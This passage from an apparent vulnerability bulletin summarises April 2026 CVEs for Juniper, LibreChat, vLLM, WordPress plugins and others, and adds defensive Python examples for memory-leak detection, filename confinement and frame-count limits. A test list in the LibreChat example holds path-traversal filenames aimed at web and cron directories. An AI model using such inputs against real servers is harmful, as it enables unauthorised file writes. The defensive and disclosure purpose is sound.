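    """PIDs the mgd advisory says can be terminated: mgd instances in 'lockf'."""
    return [p.pid for p in procs if p.command == "mgd" and p.state == "lockf"]


def resident_kb(procs: Sequence[Proc], command: str) -> int:
    """Total RES across all instances of a daemon (some run several processes)."""
    return sum(p.res_kb for p in procs if p.command == command)


def leak_suspects(before: Sequence[Proc], after: Sequence[Proc],
                  daemons: Sequence[str] = ("bbe-smgd", "l2ald", "jdhcpd"),
                  growth: float = 0.25) -> Dict[str, float]:
    """Daemons whose RES grew by more than `growth` (a fraction) between snapshots."""
    out: Dict[str, float] = {}
    for d in daemons:
        b, a = resident_kb(before, d), resident_kb(after, d)
        if b and (a - b) / b > growth:
            out[d] = round((a - b) / b, 3)
    return out


# Constructed snapshots, laid out like the line quoted in the mgd advisory.
SNAP_T0 = """\
  PID USERNAME  PRI NICE   SIZE    RES STATE  C   TIME   WCPU COMMAND
 1234 root       20    0   501M  4640K lockf  1   0:01  0.00% mgd
 1235 root       20    0   501M  4700K select 0   0:02  0.00% mgd
 2200 root       20    0   900M   320M select 1  10:11  0.10% bbe-smgd
 2300 root       20    0   120M    48M select 0   1:03  0.01% jdhcpd
 2400 root       20    0   300M   150M select 1   5:40  0.05% l2ald
"""
SNAP_T1 = SNAP_T0.replace(" 48M ", " 96M ")   # jdhcpd resident memory doubled

if __name__ == "__main__":
    t0, t1 = parse_processes(SNAP_T0), parse_processes(SNAP_T1)
    print("hung mgd PIDs:", hung_mgd_pids(t0))
    print("leak suspects:", leak_suspects(t0, t1))
```

Feed it two captures taken some hours apart; a daemon that only grows is the signature these advisories describe, and the lockf check is cheap enough to run on every poll.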
Juniper Networks--Junos OS Evolved
A Function Call With Incorrect Argument Type vulnerability in the sensor interface of Juniper Networks Junos OS Evolved on PTX Series allows a network-based, authenticated attacker with low privileges to cause a complete Denial of Service (DoS). If colored SRTE policy tunnels are provisioned via PCEP, and gRPC is used to monitor traffic in these tunnels, evo-aftmand crashes and doesn't restart, which leads to a complete and persistent service impact. The system has to be manually restarted to recover. The issue is seen only when the Originator ASN field in PCEP contains a value larger than 65,535 (32-bit ASN). The issue is not reproducible when SRTE policy tunnels are statically configured.
This issue affects Junos OS Evolved on PTX Series:
  * all versions before 22.4R3-S9-EVO,
  * 23.2 versions before 23.2R2-S6-EVO,
  * 23.4 versions before 23.4R2-S7-EVO,
  * 24.2 versions before 24.2R2-S4-EVO,
  * 24.4 versions before 24.4R2-S2-EVO,
  * 25.2 versions before 25.2R1-S2-EVO, 25.2R2-EVO.
Published: 2026-04-09  CVSS: 6.5  CVE-2026-33783 [ https://www.cve.org/CVERecord?id=CVE-2026-33783 ]
https://kb.juniper.net/JSA107870

Juniper Networks--Junos OS
An OS Command Injection vulnerability in the CLI processing of Juniper Networks Junos OS and Junos OS Evolved allows a local, high-privileged attacker executing specific, crafted CLI commands to inject arbitrary shell commands as root, leading to a complete compromise of the system. Certain 'set system' commands, when executed with crafted arguments, are not properly sanitized, allowing for arbitrary shell injection. These shell commands are executed as root, potentially allowing for complete control of the vulnerable system.
This issue affects Junos OS:
  * all versions before 22.4R3-S8,
  * from 23.2 before 23.2R2-S5,
  * from 23.4 before 23.4R2-S7,
  * from 24.2 before 24.2R2-S2,
  * from 24.4 before 24.4R2,
  * from 25.2 before 25.2R2.
Junos OS Evolved:
  * all versions before 22.4R3-S8-EVO,
  * from 23.2 before 23.2R2-S5-EVO,
  * from 23.4 before 23.4R2-S7-EVO,
  * from 24.2 before 24.2R2-S2-EVO,
  * from 24.4 before 24.4R2-EVO,
  * from 25.2 before 25.2R1-S1-EVO, 25.2R2-EVO.
Published: 2026-04-09  CVSS: 6.7  CVE-2026-33791 [ https://www.cve.org/CVERecord?id=CVE-2026-33791 ]
https://kb.juniper.net/JSA107875

danny-avila--LibreChat
LibreChat is a ChatGPT clone with additional features. Prior to 0.8.4, LibreChat trusts the name field returned by the execute_code sandbox when persisting code-generated artifacts. On deployments using the default local file strategy, a malicious artifact filename containing traversal sequences (for example, ../../../../../app/client/dist/poc.txt) is concatenated into the server-side destination path and written with fs.writeFileSync() without sanitization. This gives any user who can trigger execute_code an arbitrary file write primitive as the LibreChat server user. This vulnerability is fixed in 0.8.4.
Published: 2026-04-07  CVSS: 6.3  CVE-2026-34371 [ https://www.cve.org/CVERecord?id=CVE-2026-34371 ]
https://github.com/danny-avila/LibreChat/security/advisories/GHSA-qrm5-r67f-6692

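The LibreChat entry is the classic shape of an arbitrary-file-write primitive: a filename chosen by a less trusted component (here the code sandbox) joined onto a server path without confinement. The check below is an added example and not LibreChat's code; LibreChat is a Node.js project, so this is a Python rendering of the same control. It rejects rather than "cleans" any name carrying a directory component, because a sandbox that returns ../ in a filename is itself a signal worth logging. The base directory and filenames are constructed for illustration.

```python
"""Confine a sandbox-supplied artifact filename to the artifact directory.
Added example, not LibreChat's code; directory and names are constructed."""
import os
import tempfile
from pathlib import Path
from typing import Dict, List


class UnsafeFilename(ValueError):
    """Raised when an untrusted name would escape the artifact directory."""


def safe_artifact_path(base_dir: str, untrusted_name: str) -> Path:
    base = Path(base_dir).resolve()
    # 1. A bare filename is the only acceptable shape. Anything with a directory
    #    component, traversal, an absolute prefix or a NUL byte is refused.
    normalised = untrusted_name.replace("\\", "/")
    if (not normalised or "\x00" in normalised
            or normalised in (".", "..")
            or os.path.basename(normalised) != normalised):
        raise UnsafeFilename(f"rejected artifact name {untrusted_name!r}")
    # 2. Belt and braces: after symlink resolution the target's parent must
    #    still be the artifact directory itself.
    candidate = (base / normalised).resolve()
    if candidate.parent != base:
        raise UnsafeFilename(f"{candidate} is outside {base}")
    return candidate


def write_artifact(base_dir: str, untrusted_name: str, data: bytes) -> Path:
    """Write only after confinement; this is the step fs.writeFileSync() played."""
    target = safe_artifact_path(base_dir, untrusted_name)
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_bytes(data)
    return target


TRAVERSAL_SAMPLES: List[str] = [
    "../../../../../app/client/dist/poc.txt",   # the advisory's example shape
    "/etc/cron.d/poc",                          # absolute path
    "sub/poc.txt",                              # directory component
    "..",
    "",
    "poc\x00.txt",
]


def demo() -> Dict[str, object]:
    """Exercise the check in a scratch directory; returns what was written and blocked."""
    blocked: List[str] = []
    with tempfile.TemporaryDirectory() as scratch:
        written = write_artifact(scratch, "plot.png", b"\x89PNG").read_bytes()
        for bad in TRAVERSAL_SAMPLES:
            try:
                safe_artifact_path(scratch, bad)
            except UnsafeFilename:
                blocked.append(bad)
    return {"written": written, "blocked": blocked}


if __name__ == "__main__":
    print(demo())
```

The second check matters on its own when the artifact directory can contain symlinks: a bare filename that resolves through a link still ends up outside the directory, and only the post-resolution comparison catches it.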
AcademySoftwareFoundation--openexr
OpenEXR provides the specification and reference implementation of the EXR file format, an image storage format for the motion picture industry. From 3.4.0 to before 3.4.9, a missing bounds check on the dataWindow attribute in EXR file headers allows an attacker to trigger a signed integer overflow in generic_unpack(). By setting dataWindow.min.x to a large negative value, OpenEXRCore computes an enormous image width, which is later used in a signed integer multiplication that overflows, causing the process to terminate with SIGILL via UBSan. This vulnerability is fixed in 3.4.9.
Published: 2026-04-06  CVSS: 6.5  CVE-2026-34378 [ https://www.cve.org/CVERecord?id=CVE-2026-34378 ]
https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-v76p-4qvv-vh4g
https://github.com/AcademySoftwareFoundation/openexr/releases/tag/v3.4.9

vllm-project--vllm
vLLM is an inference and serving engine for large language models (LLMs). From 0.7.0 to before 0.19.0, the VideoMediaIO.load_base64() method at vllm/multimodal/media/video.py splits video/jpeg data URLs by comma to extract individual JPEG frames, but does not enforce a frame count limit. The num_frames parameter (default: 32), which is enforced by the load_bytes() code path, is completely bypassed in the video/jpeg base64 path. An attacker can send a single API request containing thousands of comma-separated base64-encoded JPEG frames, causing the server to decode all frames into memory and crash with OOM. This vulnerability is fixed in 0.19.0.
Published: 2026-04-06  CVSS: 6.5  CVE-2026-34755 [ https://www.cve.org/CVERecord?id=CVE-2026-34755 ]
https://github.com/vllm-project/vllm/security/advisories/GHSA-pq5c-rjhq-qp7p

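Both vLLM entries share a root cause: a multiplicity the client controls (frame count here, the n parameter in the next entry) is acted on before it is bounded. The loader below is an added example, not vLLM's code. It follows the data-URL shape the advisory describes (data:video/jpeg;base64, followed by comma-separated base64 JPEG frames) and shows the order that matters: count the frames on the undecoded string, refuse before any decoding or allocation, then cap each frame and confirm it really is a JPEG. The frame bytes are constructed stubs (a JPEG SOI marker plus padding) and the limits are illustrative.

```python
"""Frame-count enforcement for video/jpeg data URLs. Added example, not vLLM's
code; frames are constructed stubs and the limits are illustrative."""
import base64
import binascii
from typing import List

PREFIX = "data:video/jpeg;base64,"
JPEG_SOI = b"\xff\xd8\xff"
MAX_FRAMES = 32             # mirrors the num_frames default quoted in the advisory
MAX_FRAME_BYTES = 4 << 20   # illustrative per-frame cap


class MediaRejected(ValueError):
    pass


def load_frames_unbounded(url: str) -> List[bytes]:
    """The flawed shape: split on commas and decode everything that arrives."""
    return [base64.b64decode(chunk) for chunk in url[len(PREFIX):].split(",")]


def load_frames(url: str, max_frames: int = MAX_FRAMES) -> List[bytes]:
    """Hardened: bound the count before decoding, cap size, verify frame type."""
    if not url.startswith(PREFIX):
        raise MediaRejected("not a video/jpeg base64 data URL")
    payload = url[len(PREFIX):]
    # Counting separators touches the string once and allocates nothing, so an
    # oversized request is refused before a single frame is decoded.
    n_frames = payload.count(",") + 1
    if n_frames > max_frames:
        raise MediaRejected(f"{n_frames} frames exceeds limit of {max_frames}")
    frames: List[bytes] = []
    for chunk in payload.split(","):
        if len(chunk) > (MAX_FRAME_BYTES * 4) // 3 + 4:   # base64 expansion
            raise MediaRejected("frame exceeds size limit")
        try:
            raw = base64.b64decode(chunk, validate=True)
        except binascii.Error as exc:
            raise MediaRejected(f"invalid base64 frame: {exc}") from None
        if not raw.startswith(JPEG_SOI):
            raise MediaRejected("frame is not a JPEG")
        frames.append(raw)
    return frames


def make_data_url(n_frames: int) -> str:
    """Constructed request payload with n stub JPEG frames (SOI + padding)."""
    stub = base64.b64encode(JPEG_SOI + b"\xe0" + b"\x00" * 28).decode()
    return PREFIX + ",".join([stub] * n_frames)


if __name__ == "__main__":
    print(len(load_frames(make_data_url(4))), "frames accepted")
    try:
        load_frames(make_data_url(5000))
    except MediaRejected as exc:
        print("rejected:", exc)
```

The same ordering applies to a request-level count such as n: validate the bound in the request model, before anything is copied or scheduled on its behalf.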
vllm-project--vllm
vLLM is an inference and serving engine for large language models (LLMs). From 0.1.0 to before 0.19.0, a Denial of Service vulnerability exists in the vLLM OpenAI-compatible API server. Due to the lack of an upper bound validation on the n parameter in the ChatCompletionRequest and CompletionRequest Pydantic models, an unauthenticated attacker can send a single HTTP request with an astronomically large n value. This completely blocks the Python asyncio event loop and causes immediate Out-Of-Memory crashes by allocating millions of request object copies in the heap before the request even reaches the scheduling queue. This vulnerability is fixed in 0.19.0.
Published: 2026-04-06  CVSS: 6.5  CVE-2026-34756 [ https://www.cve.org/CVERecord?id=CVE-2026-34756 ]
https://github.com/vllm-project/vllm/security/advisories/GHSA-3mwp-wvh9-7528
https://github.com/vllm-project/vllm/pull/37952
https://github.com/vllm-project/vllm/commit/b111f8a61f100fdca08706f41f29ef3548de7380

electron--electron
Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5, when a renderer calls window.open() with a target name, Electron did not correctly scope the named-window lookup to the opener's browsing context group. A renderer could navigate an existing child window that was opened by a different, unrelated renderer if both used the same target name. If that existing child was created with more permissive webPreferences (via setWindowOpenHandler's overrideBrowserWindowOptions), content loaded by the second renderer inherits those permissions. Apps are only affected if they open multiple top-level windows with differing trust levels and use setWindowOpenHandler to grant child windows elevated webPreferences such as a privileged preload script. Apps that do not elevate child window privileges, or that use a single top-level window, are not affected. Apps that additionally grant nodeIntegration: true or sandbox: false to child windows (contrary to the security recommendations) may be exposed to arbitrary code execution. This vulnerability is fixed in 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5.
Published: 2026-04-07  CVSS: 6.0  CVE-2026-34765 [ https://www.cve.org/CVERecord?id=CVE-2026-34765 ]
https://github.com/electron/electron/security/advisories/GHSA-f3pv-wv63-48x8

burlingtonbytes--WP Blockade Visual Page Builder
The WP Blockade plugin for WordPress is vulnerable to Missing Authorization in all versions up to and including 0.9.14. The plugin registers an admin_post action hook 'wp-blockade-shortcode-render' that maps to the render_shortcode_preview() function. This function lacks any capability check (current_user_can()) and nonce verification, allowing any authenticated user to execute arbitrary WordPress shortcodes. The function takes a user-supplied 'shortcode' parameter from $_GET, passes it through stripslashes(), and directly executes it via do_shortcode(). This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes, which could lead to information disclosure, privilege escalation, or other impacts depending on what shortcodes are registered on the site (e.g., shortcodes from other plugins that display sensitive data, perform actions, or include files).
Published: 2026-04-08  CVSS: 6.5  CVE-2026-3480 [ https://www.cve.org/CVERecord?id=CVE-2026-3480 ]
https://www.wordfence.com/threat-intel/vulnerabilities/id/3f159aac-092b-4655-9d97-a496ac01738c?source=cve
https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L393
https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L393
https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L361
https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L361
https://plugins.trac.wordpress.org/browser/wp-blockade/trunk/wp-blockade.php#L112
https://plugins.trac.wordpress.org/browser/wp-blockade/tags/0.9.14/wp-blockade.php#L112

David Lingren--Media Library Assistant
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in David Lingren Media Library Assistant allows Stored XSS. This issue affects Media Library Assistant: from n/a through 3.34.
Published: 2026-04-06  CVSS: 6.5  CVE-2026-34897 [ https://www.cve.org/CVERecord?id=CVE-2026-34897 ]
https://patchstack.com/database/wordpress/plugin/media-library-assistant/vulnerability/wordpress-media-library-assistant-plugin-3-34-cross-site-scripting-xss-vulnerability?_s_id=cve

Red Hat--mirror registry for Red Hat OpenShift
A flaw was found in the OpenShift Mirror Registry. This vulnerability allows an unauthenticated, remote attacker to enumerate valid usernames and email addresses via different error messages during authentication failures and account creation.
Published: 2026-04-08  CVSS: 5.3  CVE-2025-14243 [ https://www.cve.org/CVERecord?id=CVE-2025-14243 ]
https://access.redhat.com/security/cve/CVE-2025-14243
RHBZ#2419829 [ https://bugzilla.redhat.com/show_bug.cgi?id=2419829 ]

inisev--BackupBliss Backup & Migration with Free Cloud Storage The Backup Migration plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.0.0. This is due to a missing capability check on the 'initializeOfflineAjax' function and lack of proper nonce verification. The endpoint only validates against hardcoded tokens which are publicly exposed in the plugin's JavaScript. This makes it possible for unauthenticated attackers to trigger the backup upload queue processing, potentially causing unexpected backup transfers to configured cloud storage targets and resource exhaustion. 2026-04-07 5.3 CVE-2025-14944 [ https://www.cve.org/CVERecord?id=CVE-2025-14944 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/a2a41a15-0743-48cc-8c92-7cb839fa5847?source=cve https://plugins.trac.wordpress.org/browser/backup-backup/trunk/includes/offline.php#L29 https://plugins.trac.wordpress.org/browser/backup-backup/trunk/includes/ajax_offline.php#L112 https://plugins.trac.wordpress.org/changeset?old=3386897&old_path=backup-backup%2Ftags%2F2.0.0%2Fincludes%2Foffline.php&new=3449635&new_path=backup-backup%2Ftags%2F2.1.0%2Fincludes%2Foffline.php
johanaarstein--AM LottiePlayer The AM LottiePlayer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via uploaded SVG files in all versions up to, and including, 3.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2026-04-08 5.4 CVE-2025-1794 [ https://www.cve.org/CVERecord?id=CVE-2025-1794 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/ef2f1ad1-1e2e-4b56-b16c-d87956b142ad?source=cve https://plugins.trac.wordpress.org/browser/am-lottieplayer/tags/3.5.0/includes/upload-thumbnail.php
Hitachi--JP1/IT Desktop Management 2 - Manager Buffer Overflow Vulnerability in JP1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management 2 - Operations Director on Windows, Job Management Partner 1/IT Desktop Management 2 - Manager on Windows, JP1/IT Desktop Management - Manager on Windows, Job Management Partner 1/IT Desktop Management - Manager on Windows, JP1/NETM/DM Manager on Windows, JP1/NETM/DM Client on Windows, Job Management Partner 1/Software Distribution Manager on Windows, Job Management Partner 1/Software Distribution Client on Windows. This issue affects JP1/IT Desktop Management 2 - Manager: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; JP1/IT Desktop Management 2 - Operations Director: from 13-50 before 13-50-02, from 13-11 before 13-11-04, from 13-10 before 13-10-07, from 13-01 before 13-01-07, from 13-00 before 13-00-05, from 12-60 before 12-60-12, from 10-50 through 12-50-11; Job Management Partner 1/IT Desktop Management 2 - Manager: from 10-50 through 10-50-11; JP1/IT Desktop Management - Manager: from 09-50 through 10-10-16; Job Management Partner 1/IT Desktop Management - Manager: from 09-50 through 10-10-16; JP1/NETM/DM Manager: from 09-00 through 10-20-02; JP1/NETM/DM Client: from 09-00 through 10-20-02; Job Management Partner 1/Software Distribution Manager: from 09-00 through 09-51-13; Job Management Partner 1/Software Distribution Client: from 09-00 through 09-51-13. 2026-04-07 5.5 CVE-2025-65116 [ https://www.cve.org/CVERecord?id=CVE-2025-65116 ] https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2026-118/index.html
vsourz1td--Advanced Contact form 7 DB The Advanced Contact form 7 DB plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.9. This is due to missing or incorrect nonce validation on the 'vsz_cf7_save_setting_callback' function. This makes it possible for unauthenticated attackers to delete form entries via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. 2026-04-08 5.4 CVE-2026-0811 [ https://www.cve.org/CVERecord?id=CVE-2026-0811 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/88097744-d2f5-4ae5-aa71-0f4a0decd911?source=cve https://plugins.trac.wordpress.org/browser/advanced-cf7-db/tags/2.0.9/admin/class-advanced-cf7-db-admin.php#L885 https://plugins.trac.wordpress.org/changeset/3497481/advanced-cf7-db
GitLab--GitLab GitLab has remediated an issue in GitLab EE affecting all versions from 18.0.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that in Code Quality reports could have allowed an authenticated user to leak IP addresses of users viewing the report via specially crafted content. 2026-04-08 5.7 CVE-2026-1516 [ https://www.cve.org/CVERecord?id=CVE-2026-1516 ] HackerOne Bug Bounty Report #3514461 [ https://hackerone.com/reports/3514461 ] https://gitlab.com/gitlab-org/gitlab/-/work_items/587893 https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/
wpmudev--Hustle Email Marketing, Lead Generation, Optins, Popups The Hustle - Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'hustle_module_converted' AJAX action in all versions up to, and including, 7.8.10.2. This makes it possible for unauthenticated attackers to forge conversion tracking events for any Hustle module, including draft modules that are never displayed to users, thereby manipulating marketing analytics and conversion statistics. 2026-04-07 5.3 CVE-2026-2263 [ https://www.cve.org/CVERecord?id=CVE-2026-2263 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/2305462c-0a00-4423-8dc2-e32628c4864d?source=cve https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front-ajax.php#L32 https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front-ajax.php#L1047 https://plugins.trac.wordpress.org/browser/wordpress-popup/tags/7.8.9.3/inc/front/hustle-module-front.php#L311 https://plugins.trac.wordpress.org/changeset?old_path=/wordpress-popup/tags/7.8.10.2&new_path=/wordpress-popup/tags/7.8.11
OCS Inventory--OCS Inventory NG Server OCS Inventory NG Server versions 2.12.3 and prior contain a stored cross-site scripting vulnerability that allows unauthenticated attackers to execute arbitrary JavaScript by submitting malicious User-Agent HTTP headers to the /ocsinventory endpoint. Attackers can register rogue agents or craft requests with malicious User-Agent values that are stored without sanitation and rendered with insufficient encoding in the web console, leading to arbitrary JavaScript execution in the browsers of authenticated users viewing the statistics dashboard. 2026-04-06 5.4 CVE-2026-22675 [ https://www.cve.org/CVERecord?id=CVE-2026-22675 ] https://github.com/OCSInventory-NG/OCSInventory-Server/pull/483 https://github.com/OCSInventory-NG/OCSInventory-Server/commit/78faf2ca8b897141ba4d337d75692ab8e405bd4e https://www.vulncheck.com/advisories/ocs-inventory-ng-server-stored-xss-via-user-agent
Volcengine--OpenViking OpenViking versions prior to 0.3.3 contain a missing authorization vulnerability in the task polling endpoints that allows unauthorized attackers to enumerate or retrieve background task metadata created by other users. Attackers can access the /api/v1/tasks and /api/v1/tasks/{task_id} routes without authentication to expose task type, task status, resource identifiers, archive URIs, result payloads, and error information, potentially causing cross-tenant interference in multi-tenant deployments. 2026-04-07 5.3 CVE-2026-22680 [ https://www.cve.org/CVERecord?id=CVE-2026-22680 ] https://github.com/volcengine/OpenViking/releases/tag/v0.3.3 https://github.com/volcengine/OpenViking/pull/1182 https://github.com/volcengine/OpenViking/commit/8c1c3f3608364ee0bb0e45f73478771a68aebdf5 https://www.vulncheck.com/advisories/openviking-missing-authorization-via-task-polling
HDFGroup--hdf5 HDF5 is software for managing data. In 1.14.1-2 and earlier, an attacker who can control an h5 file parsed by HDF5 can trigger a write-based heap buffer overflow condition in the H5T__ref_mem_setnull method. This can lead to a denial-of-service condition, and potentially further issues such as remote code execution depending on the practical exploitability of the heap overflow against modern operating systems. 2026-04-10 5.5 CVE-2026-29043 [ https://www.cve.org/CVERecord?id=CVE-2026-29043 ] https://github.com/HDFGroup/hdf5/security/advisories/GHSA-qm2m-5g5w-2277
smub--Charitable Donation Plugin for WordPress Fundraising with Recurring Donations & More The Charitable - Donation Plugin for WordPress - Fundraising with Recurring Donations & More plugin for WordPress is vulnerable to Insufficient Verification of Data Authenticity in versions up to, and including, 1.8.9.7. This is due to missing cryptographic verification of incoming Stripe webhook events. This makes it possible for unauthenticated attackers to forge payment_intent.succeeded webhook payloads and mark pending donations as completed without a real payment. 2026-04-07 5.3 CVE-2026-3177 [ https://www.cve.org/CVERecord?id=CVE-2026-3177 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/bc3b2645-7b57-4884-99c5-e37dbd4a9600?source=cve https://plugins.trac.wordpress.org/changeset/3485023/charitable
Red Hat--mirror registry for Red Hat OpenShift A flaw was found in Red Hat Quay's Proxy Cache configuration feature. When an organization administrator configures an upstream registry for proxy caching, Quay makes a network connection to the specified registry hostname without verifying that it points to a legitimate external service. An attacker with organization administrator privileges could supply a crafted hostname to force the Quay server to make requests to internal network services, cloud infrastructure endpoints, or other resources that should not be accessible from the Quay application. 2026-04-08 5.2 CVE-2026-32591 [ https://www.cve.org/CVERecord?id=CVE-2026-32591 ] https://access.redhat.com/security/cve/CVE-2026-32591 RHBZ#2446965 [ https://bugzilla.redhat.com/show_bug.cgi?id=2446965 ]
opensourcepos--opensourcepos Open Source Point of Sale is a web-based point-of-sale application written in PHP using the CodeIgniter framework. Prior to 3.4.3, a Stored Cross-Site Scripting (XSS) vulnerability exists in the Daily Sales management table. The customer_name column is configured with escape: false in the bootstrap-table column configuration, causing customer names to be rendered as raw HTML. An attacker with customer management permissions can inject arbitrary JavaScript into a customer's first_name or last_name field, which executes in the browser of any user viewing the Daily Sales page. This vulnerability is fixed in 3.4.3. 2026-04-07 5.4 CVE-2026-32712 [ https://www.cve.org/CVERecord?id=CVE-2026-32712 ] https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-hcfr-9hfv-mcwp
chamilo--chamilo-lms Chamilo LMS is a learning management system. Prior to 2.0.0-RC.3, a Reflected Cross-Site Scripting (XSS) vulnerability in the exercise question list admin panel allows an attacker to execute arbitrary JavaScript in an authenticated teacher's browser. The pagination code merges all $_GET parameters via array_merge() and outputs the result via http_build_query() directly into HTML href attributes without htmlspecialchars() encoding. This vulnerability is fixed in 2.0.0-RC.3. 2026-04-10 5.4 CVE-2026-32893 [ https://www.cve.org/CVERecord?id=CVE-2026-32893 ] https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-37jh-g64j-88mc https://github.com/chamilo/chamilo-lms/commit/72bc403f89b1ebb73a139f8f6cf0478857592276
Microsoft--Microsoft Edge for Android User interface (UI) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network. 2026-04-10 5.4 CVE-2026-33119 [ https://www.cve.org/CVERecord?id=CVE-2026-33119 ] Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability [ https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33119 ]
pi-hole--web Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, configuration values from the /api/config endpoint are placed directly into HTML value="" attributes without escaping in settings-advanced.js, enabling HTML attribute injection. A double quote in any config value breaks out of the attribute context. JavaScript execution is blocked by the server's CSP (script-src 'self'), but injected attributes can alter element styling for UI redressing. The primary attack vector is importing a malicious teleporter backup, which bypasses per-field server-side validation. This vulnerability is fixed in 6.5. 2026-04-06 5.4 CVE-2026-33406 [ https://www.cve.org/CVERecord?id=CVE-2026-33406 ] https://github.com/pi-hole/web/security/advisories/GHSA-9rfm-c5g6-538p
themeum--Tutor LMS eLearning and online course solution The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to unauthorized private course enrollment in all versions up to, and including, 3.9.7. This is due to missing post_status validation in the `enroll_now()` and `course_enrollment()` functions. Both enrollment endpoints verify the nonce, user authentication, and whether the course is purchasable, but fail to check if the course has a `private` post_status. This makes it possible for authenticated attackers with Subscriber-level access or above to enroll in private courses by sending a crafted POST request with the target course ID. The enrollment record is created in the database and the private course title and enrollment status are exposed in the subscriber's dashboard, though WordPress core access control prevents the subscriber from viewing the actual course content (returns 404). Enrollment in private courses should be restricted to users with the `read_private_posts` capability. 2026-04-11 5.4 CVE-2026-3358 [ https://www.cve.org/CVERecord?id=CVE-2026-3358 ] https://www.wordfence.com/threat-intel/vulnerabilities/id/0c173356-7228-4253-bb28-2c2e11af76fd?source=cve https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.php#L2066 https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Course.php#L134 https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L2053 https://plugins.trac.wordpress.org/browser/tutor/trunk/classes/Course.php#L2989 https://plugins.trac.wordpress.org/changeset?old_path=%2Ftutor/tags/3.9.7&new_path=%2Ftutor/tags/3.9.8 https://plugins.trac.wordpress.org/changeset/3496394/tutor/trunk/classes/Course.php
chamilo--chamilo-lms Chamilo LMS is a learning management system. Prior to 1.11.38, Twig template files (.tpl) under /main/template/default/ are directly accessible without authentication via HTTP GET requests. These templates expose internal application logic, variable names, AJAX endpoint URLs, and admin panel structure. This vulnerability is fixed in 1.11.38. 2026-04-10 5.3 CVE-2026-33705 [ https://www.cve.org/CVERecord?id=CVE-2026-33705 ] https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-5wjg-8x28-px57 https://github.com/chamilo/chamilo-lms/commit/4efb5ee8ed849ca147ca1fe7472ef7b98db17bff
chamilo--chamilo-lms Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, multiple files use simplexml_load_string() without XXE protection. With the LIBXML_NOENT flag, arbitrary server files can be read. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3. 2026-04-10 5.3 CVE-2026-33737 [ https://www.cve.org/CVERecord?id=CVE-2026-33737 ] https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-c4ww-qgf2-v89j https://github.com/chamilo/chamilo-lms/commit/22b1cb1c609b643765c88654155aba27070c927e https://github.com/chamilo/chamilo-lms/commit/af6b7002af7c15825e98fc522e2ead0d00cacaa3
Juniper Networks--Junos OS An Incorrect Initialization of Resource vulnerability in the packet forwarding engine (pfe) of Juniper Networks Junos OS on specific EX Series and QFX Series devices allows an unauthenticated, network-based attacker to cause an integrity impact to downstream networks. When the same family inet or inet6 filter is applied on an IRB interface and on a physical interface as an egress filter on EX4100, EX4400, EX4650 and QFX5120 devices, only one of the two filters will be applied, which can lead to traffic being sent out one of these interfaces which should have been blocked. This issue affects Junos OS on EX Series and QFX Series: * 23.4 version 23.4R2-S6, * 24.2 version 24.2R2-S3. No other Junos OS versions are affected. 2026-04-09 5.8 CVE-2026-33773 [ https://www.cve.org/CVERecord?id=CVE-2026-33773 ] https://kb.juniper.net/JSA107815
